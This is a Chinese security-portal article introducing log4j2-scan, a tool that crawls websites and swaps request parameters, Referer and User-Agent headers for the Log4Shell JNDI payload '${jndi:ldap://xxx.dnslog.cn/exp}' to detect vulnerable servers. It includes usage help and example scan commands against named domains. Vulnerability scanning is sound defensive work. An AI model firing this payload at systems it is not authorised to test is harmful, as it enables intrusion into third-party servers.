freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

【log4j2-scan】使用浏览器爬虫获取网站全链接扫描log4j2漏洞工具
总得前行 2022-03-23 21:08:28 241810
所属地 江苏省

log4j2-scan

工具简介

log4j2-scan是一款利用浏览器爬虫爬取网站所有链接,并替换参数值为${jndi:ldap://xxx.dnslog.cn/exp}形式,旨在遍历所有链接发现log4j2漏洞的工具。

工作流程

  1. 程序的工作流是利用rad爬取网站所有链接

    • 自动适配操作系统下载rad程序

  2. 替换值为log4j2漏洞的payload

    • 更改请求中refer、agent值为payload

    • 更改GET型请求中'='号后的值为payload;

    • 更改POST型请求中data数据包中'=''、':'(json格式)后的值为payload

  3. 将替换好的请求进行重放。

    • 如未定义payload, 脚本将自动从dnglog获取并定义未${jndi:ldap://xxx.dnslog.cn/exp}

    • 如果是采用默认的dnslog为接收站点,那么将每重放十次检测一次dnslog。(考虑dnslog请求太多会被封禁)

    • 如自定义接收站点,将不进行检测。

运行参数

  • 需要注意的是,必须安装有chrome才可以运行,不支持firefox等。 如chrome不是默认位置,须在rad_config.yml文件中指定chrome路径。

  • payload值默认自动从dnslog获取,但是因平台问题无法访问时,程序会提示错误。用户可以自定义其他站点或ip,如http://ceye.io/

_                _  _   _ ____      ____
    | |    ___   __ _| || | (_)___ \    / ___|  ___ __ _ _ __  _ __   ___ _ __
    | |   / _ \ / _` | || |_| | __) |___\___ \ / __/ _` | '_ \| '_ \ / _ \ '__|
    | |__| (_) | (_| |__   _| |/ __/_____|__) | (_| (_| | | | | | | |  __/ |
    |_____\___/ \__, |  |_|_/ |_____|   |____/ \___\__,_|_| |_|_| |_|\___|_|
                |___/     |__/     by jshahjk@163.com. Illegal use is prohibited.

rad_windows_amd64.exe
usage: scan_with_rad.py [-h] [-u URL] [-f FILE] [-c CHROME_PATH] [-p PAYLOAD]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -f FILE, --file FILE  file containing url.
  -c CHROME_PATH        Specify the chrome path.
  -p PAYLOAD, --payload PAYLOAD
                        Specify the payload like ${jndi:ldap://xx}.

运行命令:

python scan_with_rad.py -u www.hao24.com
python scan_with_rad.py -p mh7av.ceye.io -u www.xxxx.com

工具地址

https://github.com/zongdeiqianxing/log4j2-scan

# 工具 # 工具分享 # log4j2 # Log4j2的JNDI注入漏洞
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 总得前行 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
总得前行 LV.3
这家伙太懒了,还未填写个人描述!
  • 10 文章数
  • 7 关注者
XDEBUG调试配置
2022-12-30
路由器固件模拟环境搭建
2022-09-19
Scrapy爬虫问题的调试小则
2022-08-24
文章目录